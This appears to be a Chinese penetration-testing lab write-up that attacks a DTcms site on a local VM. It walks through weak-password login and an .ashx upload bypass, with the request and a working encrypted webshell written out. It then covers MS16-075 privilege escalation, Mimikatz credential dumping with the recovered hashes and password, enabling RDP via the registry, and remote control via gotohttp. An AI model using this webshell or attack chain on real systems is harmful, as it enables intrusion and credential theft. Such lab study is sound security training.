Windows综合渗透_DTcms_远控gotohttp软件在渗透中利用
字数 1237 2025-08-22 12:22:42
Windows综合渗透:DTcms漏洞利用与远控工具gotohttp的应用
1. 靶场环境搭建
- 使用VMware虚拟机打开提供的vmx文件
- 网络模式:NAT
- 攻击机:Kali Linux (192.168.111.128)
- 目标机:192.168.111.136
2. 信息收集阶段
2.1 主机发现
nmap -sP 192.168.111.0/24
参数说明:
-sP:Ping扫描(在较新版本中已被-sn替代),仅检测主机是否在线,不进行端口扫描
扫描结果识别出目标IP为192.168.111.136
2.2 全端口扫描
发现目标开放80端口,运行"轻软智新管理系统"
2.3 目录扫描
识别出系统为DTcms,并发现后台登录地址
3. 漏洞利用
3.1 弱口令登录
使用默认凭证成功登录:
- 用户名:admin123
- 密码:admin123
3.2 文件上传漏洞利用
- 进入控制面板→系统管理→系统设置→文件上传设置
- 添加上传类型:aspx, ashx
- 测试发现aspx无法上传,但ashx上传成功
上传请求示例:
POST /tools/upload_ajax.ashx?action=UpLoadFile&DelFilePath=/upload/201504/19/201504191635524475.jpg&DelFilePath=%2Fupload%2F201504%2F19%2F201504191635524475.jpg&id=WU_FILE_0&name=shell.ashx&type=application%2Foctet-stream&lastModifiedDate=2024%2F11%2F23+15%3A59%3A56&size=731 HTTP/1.1
Host: 192.168.111.136
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Length: 731
Origin: http://192.168.111.136
Connection: keep-alive
Referer: http://192.168.111.136/admin/article/article_edit.aspx?action=Edit&channel_id=3&id=86
Cookie: ASP.NET_SessionId=3fzbc4t5mc0ohqh3lpkvqlnf; DTRememberName=admin123; AdminName=DTcms=admin123; AdminPwd=DTcms=3BEF6E03B7E1F5DC624E68F8C6A780E4
Webshell内容(ashx格式):
<%@ webhandler language="C#" class="NodeHandler" %>
using System;
using System.Web;
using System.Text;
using System.Reflection;
public class NodeHandler : IHttpHandler,System.Web.SessionState.IRequiresSessionState{
public bool IsReusable { get { return true; } }
public void ProcessRequest(HttpContext ctx) {
ctx.Session.Add("k","e45e329feb5d925b"); /*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
byte[] k = Encoding.Default.GetBytes(ctx.Session[0] + ""),c = ctx.Request.BinaryRead(ctx.Request.ContentLength);
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(ctx);
}
}
3.3 使用冰蝎连接
成功连接webshell
4. 权限提升
4.1 系统检查
tasklist /SVC
确认系统无杀毒软件
4.2 使用MS16-075提权
漏洞信息:
- CVE编号:CVE-2016-3224
- 影响系统:Windows 7/8.1/10, Server 2008/2012/2016等
- 漏洞类型:本地权限提升(LPE)
- 利用条件:已获得标准用户权限
成功利用该漏洞提升至系统权限
5. 凭证获取
5.1 使用Mimikatz获取凭证
logonpasswords
获取到的关键凭证信息:
- 用户名:Administrator
- 域:WIN-IRO7C4CHEKV
- NTLM Hash:93711c135bb906a6a9cc4f3b4f3d3445
- SHA1 Hash:656331c76985285fd21feb2acea3889e60e52ec7
解密后得到明文密码:qwe@QWE123.com
6. 远程桌面连接尝试
6.1 开启远程桌面服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
6.2 检查远程桌面端口
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
- 0xd3d表示3389端口(16进制)
6.3 连接问题
尝试使用Hash和明文密码连接均失败,报错:
"发生身份验证错误。要求的函数不受支持...这可能是因为在远程计算机上阻止NTLM身份验证..."
7. 使用替代远程控制工具
7.1 gotohttp工具介绍
优点:
- 上传速度快(仅3M)
- 使用方便(无需下载软件直接连接)
- 连接简单(连接密码在当前目录的配置文件中)
7.2 源代码审计
使用代码审计工具检查未发现其他明显漏洞
8. 总结
本次渗透测试流程:
- 信息收集 → 2. 弱口令利用 → 3. 文件上传漏洞 → 4. Webshell获取 → 5. 权限提升 → 6. 凭证获取 → 7. 远程控制
关键点:
- DTcms默认弱口令
- 文件上传类型限制绕过
- MS16-075提权漏洞利用
- 多种远程控制方案备选